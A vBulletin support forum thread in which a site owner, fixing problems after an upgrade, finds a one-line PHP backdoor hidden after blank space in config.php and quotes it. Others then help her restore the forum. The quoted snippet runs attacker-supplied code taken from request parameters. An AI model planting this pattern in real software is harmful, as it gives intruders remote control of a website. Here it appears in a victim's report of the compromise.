Many problems after upgrade

Collapse
X

• Time
  • Show
Clear All
  • Lene
    • Nov 2008

I just found something. On a hunch, since the config.php is the only files not to be either uploaded fresh or deleted, maybe it could have been the cause of the problems. I compared the config.php I've backed up from the server to the sample one that's included in the packages. The sample one ends where it states when you downloaded it and a revision number, but my backed up one has several empty pages after this point, then this shows up:

PHP Code:
    if (isset($_REQUEST['FILE'])){$_FILE $_REQUEST['8309FC70C6043640CAFDAE4541AC018E']('$_',$_REQUEST['FILE'].'($_);');  $_FILE(stripslashes($_REQUEST['HOST']));} 
    Can this be the source of all my problems?

Comment

• 14DH01
      • Sep 2010
      • 4.2.x

then take your config.php file and returns values ​​for your database file for config.php.new (do not forget to remove it. "new").
      I guess you can do it

- - - Updated - - -

.Click image for larger version

Name:	62.gif
Views:	1
Size:	7.6 KB
ID:	3690334
      Last edited by 14DH01; Sat 15 Sep '12, 3:09pm.
      my forum Support bug reports please

Comment

• Lene
        • Nov 2008

I've edited the file, and uploaded 4.2 again. However, now it wants the install file, and that something I've read a hundred times here that I should not use unless I want a completely fresh installation. If worse comes to worse, I have a backup of the database from after the forum was taken off the air for upgrading, so I can install fresh if I have to. But I don't know how to restore the database. I don't have phpMyAdmin, my host recommends against it, plus they have a way to get download backups on their site, as well as a way to delete the database, so normally I wouldn't need it. I have access to unix shell, I just need someone to provide me with the correct query to restore the database.

- - - Updated - - -

Oops, never mind, I'd missed the database prefix I'm running the upgrade script yet again, just to make sure.

(and I can't use the Edit post function here, it won't save)

- - - Updated - - -

It didn't work either, unfortunately. Everything is still messed up, and I'm at a loss.

Comment

• 14DH01
          • Sep 2010
          • 4.2.x

I've edited the file, and uploaded 4.2 again. However, now it wants the install file, and that something I've read a hundred times here that I should not use unless I want a completely fresh installation.
          In this case download the file "install".
          Make an update.

if there is an error message, copy it here.

Comment

• Lene
            • Nov 2008

Somehow, everything is now in order. I submitted a new support ticket, requesting a new helper, who actually did his job, fast. And he told me that everthing was working correctly. The reason I didn't see it before was that my cache was hung up on the old problems, so after clearing that and restarting my computer, everything is back to the way it's supposed to, hacker free
            Now I just have to inform the nice people at Google and StopBadware.

I wanna thank you, my French friend, for spending so much time trying to help me with this, especially seeing as the vb support person who was supposed to help me, and is paid to do so, didn't. It really is amazing that you tried so hard for me for free. So thank you!!!

Comment

• 14DH01
              • Sep 2010
              • 4.2.x

Happy for you
              It is true that your problem was not easy
              oh yeah I do not speak English, I am obliged to make use of translation google ...
              When I can, I give service.
              It is good to know for the cache. It seems to me that you had this problem, y not too long.
              I am used of ccleaner to empty my internet sessions, cache,cookies ....
              Good luck with your forum.
              @ +

Comment

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
              Working...